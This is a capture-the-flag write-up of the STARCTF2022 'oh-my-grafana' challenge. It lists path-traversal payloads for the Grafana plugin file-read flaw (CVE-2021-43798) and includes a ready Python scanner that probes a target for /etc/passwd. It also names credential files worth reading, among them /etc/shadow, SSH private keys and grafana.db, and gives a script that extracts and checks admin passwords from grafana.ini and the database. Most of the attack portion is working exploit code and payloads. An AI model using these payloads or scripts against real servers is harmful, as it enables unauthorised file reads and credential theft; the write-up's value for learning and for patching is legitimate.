STARCTF2022 oh-my-grafana

This also counts as the first web challenge I have solved in a proper competition, and I am too excited for words. I learned a lot of new things working through it, and of course my teammates helped too. I need to keep working harder~~~

From the challenge name I knew this was a Grafana framework challenge. As a newbie I had never even heard of it before this. I looked it up on Baidu and skimmed the official Grafana documentation (okay, I could not get through it at all). The default username and password are both admin, and I figured there was no way they would let you log in that easily; I tried it and sure enough it was wrong. So I searched for known Grafana vulnerabilities, and sure enough I found one: Grafana has an arbitrary file read vulnerability. I will not go into the principle in detail; it uses the plugins Grafana already has installed to construct the payload:

/public/plugins/alertlist/../../../../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd
/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../../../../etc/passwd

At first glance I thought I could just use this directly? So I tried several of the POCs and got no response at all; running them through Burp Suite gave the same result. I instantly felt awful and wanted to give up. Luckily I have a good teammate: it turns out the slashes need to be URL-encoded, so the POC becomes

/public/plugins/text/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd

and got output.
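The probing described above, as an added example (my code, not the writeup's): it builds the plugin traversal URL with `..%2f` (the form that worked for the author), tries each bundled plugin id from the list above, and checks whether the response looks like /etc/passwd. The bug is CVE-2021-43798 (Grafana 8.0.0-beta1 through 8.3.0). Browsers, and curl without `--path-as-is`, collapse raw `../` segments before the request leaves the client, which is why the encoded form is the one to send from a script. The base URL is a placeholder; the HTTP fetch is only the standard library.

```python
"""Probe a Grafana instance for the /public/plugins/<id>/ path traversal
(CVE-2021-43798). Added example for this writeup, not code from the original
post. BASE URL is a placeholder supplied on the command line."""
import re
import sys
import urllib.request

# Plugin ids bundled with Grafana 8.x (the writeup's list). Any one of them
# works as the first path component; the traversal happens after it.
PLUGINS = [
    "alertlist", "annolist", "grafana-azure-monitor-datasource", "barchart",
    "bargauge", "cloudwatch", "dashlist", "elasticsearch", "gauge", "geomap",
    "gettingstarted", "stackdriver", "graph", "graphite", "heatmap", "histogram",
    "influxdb", "jaeger", "logs", "loki", "mssql", "mysql", "news", "nodeGraph",
    "opentsdb", "piechart", "pluginlist", "postgres", "prometheus", "stat",
    "state-timeline", "status-history", "table", "table-old", "tempo",
    "testdata", "text", "timeseries", "welcome", "zipkin",
]

# ".." of "/" is still "/", so more levels than strictly needed are harmless.
TRAVERSAL_DEPTH = 11

# One /etc/passwd record: name:passwd:uid:gid:...
_PASSWD_LINE = re.compile(r"^[^:\s]+:[^:]*:\d+:\d+:", re.MULTILINE)


def build_traversal_url(base_url, plugin, target, depth=TRAVERSAL_DEPTH):
    """URL that reaches `target` through the plugin static-file route.
    The '../' segments are sent as '..%2f' so the client does not collapse
    them before Grafana decodes the path."""
    return "{}/public/plugins/{}/{}{}".format(
        base_url.rstrip("/"), plugin, "..%2f" * depth, target.lstrip("/"))


def looks_like_passwd(body):
    """True if the response body contains at least one passwd-style record."""
    return bool(_PASSWD_LINE.search(body))


def http_get(url, timeout=10):
    """Plain GET; urllib sends the percent-encoded path unchanged."""
    req = urllib.request.Request(url, headers={"User-Agent": "grafana-traversal-check"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def probe(base_url, target="/etc/passwd", plugins=PLUGINS,
          fetch=http_get, matcher=looks_like_passwd):
    """Try each plugin id; return (plugin, body) for the first hit, else None.
    Non-2xx responses raise OSError subclasses from urllib and are skipped."""
    for plugin in plugins:
        url = build_traversal_url(base_url, plugin, target)
        try:
            body = fetch(url)
        except OSError:
            continue
        if matcher(body):
            return plugin, body
    return None


if __name__ == "__main__":
    base = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:3000"
    hit = probe(base)
    if hit is None:
        print("no plugin path returned /etc/passwd")
    else:
        print("traversal works via plugin {!r}:".format(hit[0]))
        print(hit[1])
```

To read a different file, pass `target` and a `matcher` that recognises that file (for grafana.ini, for instance, a check for `[security]`), since the default matcher only knows the passwd layout.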

Here I got stuck again: which file do I look in for a password? No choice but to keep searching, and I found that the files that can be read include

/conf/defaults.ini
/etc/grafana/grafana.ini
/etc/passwd
/etc/shadow
/home/grafana/.bash_history
/home/grafana/.ssh/id_rsa
/root/.bash_history
/root/.ssh/id_rsa
/usr/local/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/proc/net/fib_trie
/proc/net/tcp
/proc/self/cmdline

No choice but to try them one by one and see which is useful. Here, using

/public/plugins/text/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/grafana/grafana.ini

the password can be found inside. But I want to point out specifically that

/public/plugins/text/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/lib/grafana/grafana.db

gives you a database file; opening it in a Kali VM shows the usernames and the encrypted passwords.

For a while I naively assumed it was base64-encoded, until I stared at the garbage that came out of decoding and started questioning my life. After confirming on Baidu that it really is not something a human can decrypt back into the real password, I had to go look elsewhere.

Back to the beginning: from the grafana.ini file we got the password and successfully got into Grafana (that sounds easy, but just finding this password took me a whole afternoon. At one point I was one step away from it, then I looked at the long string and mistook it for an encrypted value, assuming it was as impossible to decrypt as the one in the db file).

#################################### Security ####################################
[security]
# disable creation of admin user on first start of grafana
;disable_initial_admin_creation = false

# default admin user, created on startup
admin_user = admin

# default admin password, can be changed before first start of grafana,  or in profile settings
admin_password = 5f989714e132c9b04d4807dafeb10ade

# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm

...
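Added example (my code, not the post's) for pulling the credentials out of the two files just discussed. It parses grafana.ini with Python's configparser, which treats whole lines beginning with `#` or `;` as comments, so the commented-out `;secret_key` is correctly reported as absent and `admin_password` comes back as the literal string: the 32-hex-character value above that the author took for a hash is simply the password. It then reads the `user` table of grafana.db, where each row carries a per-user salt and a hex PBKDF2 digest, and checks the ini password against it. The PBKDF2 parameters (HMAC-SHA256, 10000 iterations, 50-byte output, hex-encoded) are my understanding of Grafana's util.EncodePassword in the 8.x line and should be checked against the source of the exact version. The sample ini and the in-memory database are constructed; the salt is invented.

```python
"""Extract and cross-check Grafana credentials from grafana.ini and grafana.db.
Added example for this writeup, not Grafana's code or the author's."""
import configparser
import hashlib
import hmac
import sqlite3

# Constructed sample: the [security] section from the writeup plus one
# unrelated section, so the parser has to pick the right one.
SAMPLE_INI = """\
[server]
;protocol = http
http_port = 3000

#################################### Security ####################################
[security]
# disable creation of admin user on first start of grafana
;disable_initial_admin_creation = false

# default admin user, created on startup
admin_user = admin

# default admin password, can be changed before first start of grafana,  or in profile settings
admin_password = 5f989714e132c9b04d4807dafeb10ade

# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm
"""


def load_grafana_ini(text):
    """Parse grafana.ini / defaults.ini text. Whole lines starting with '#' or
    ';' are comments, so ';secret_key = ...' is an inactive default. Keys that
    appear before the first [section] (as in defaults.ini) are collected under
    a synthetic [__root__] section; strict=False tolerates duplicated sections."""
    cp = configparser.ConfigParser(interpolation=None, allow_no_value=True, strict=False)
    cp.read_string("[__root__]\n" + text)
    return cp


def admin_credentials(cp):
    """(admin_user, admin_password) with Grafana's defaults filled in.
    The password is returned verbatim; a hex-looking value is still the
    literal password, not a digest of it."""
    sec = cp["security"] if cp.has_section("security") else {}
    return sec.get("admin_user", "admin"), sec.get("admin_password", "admin")


def active_secret_key(cp):
    """None when secret_key is only present as a commented-out default."""
    return cp.get("security", "secret_key", fallback=None)


def encode_password(password, salt):
    """Assumed to match Grafana's util.EncodePassword (8.x): PBKDF2-HMAC-SHA256,
    10000 iterations, 50-byte key, hex encoded, i.e. 100 hex characters.
    Verify against the Grafana source for the target version."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(),
                               10000, dklen=50).hex()


def verify_password(candidate, stored_hex, salt):
    """Constant-time comparison of a candidate against a stored digest."""
    return hmac.compare_digest(encode_password(candidate, salt), stored_hex)


def build_sample_db():
    """Constructed stand-in for /var/lib/grafana/grafana.db with only the
    columns of the real "user" table that matter here; the salt is invented."""
    con = sqlite3.connect(":memory:")
    con.execute('CREATE TABLE "user" (id INTEGER PRIMARY KEY, login TEXT, email TEXT, '
                'password TEXT, salt TEXT, is_admin INTEGER)')
    salt = "Q1Zq5Rv2Xw"
    con.execute('INSERT INTO "user" (login, email, password, salt, is_admin) VALUES (?, ?, ?, ?, 1)',
                ("admin", "admin@localhost",
                 encode_password("5f989714e132c9b04d4807dafeb10ade", salt), salt))
    con.commit()
    return con


def dump_users(con):
    """Rows of (login, email, password_hex, salt, is_admin).
    For the real file: dump_users(sqlite3.connect("grafana.db"))."""
    return con.execute('SELECT login, email, password, salt, is_admin FROM "user"').fetchall()


def find_password_owner(con, candidate):
    """Check a password recovered from grafana.ini against every stored digest;
    return the matching login, or None. Confirms the ini value is the live
    admin password without touching the login form."""
    for login, _email, pw_hex, salt, _is_admin in dump_users(con):
        if verify_password(candidate, pw_hex, salt):
            return login
    return None


if __name__ == "__main__":
    cp = load_grafana_ini(SAMPLE_INI)
    user, pw = admin_credentials(cp)
    print("admin_user =", user, "admin_password =", pw, "secret_key =", active_secret_key(cp))
    con = build_sample_db()
    for row in dump_users(con):
        print(row)
    print("ini password belongs to:", find_password_owner(con, pw))
```

Because the digest is salted and iterated, the stored value cannot be reversed, only checked against a guess; that is why the ini file, which holds the plaintext, is the file worth reading first.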

Once inside Grafana I was lost again: where am I supposed to find the flag? With a hint from a senior I learned that the flag has to be obtained by connecting to the database.

Configure a data source, choose MySQL (others would probably work too), and in Explore enter the SQL queries:

show databases;
show tables;
select * from fffffllllllllaaaaaaaggggg;

And that gets the flag. 13 hours in total; keep working hard.


Please credit the source when reposting. You are welcome to check the sources cited in the article and to point out anything that is wrong or unclear. You can comment in the comment section below or email 1004454362@qq.com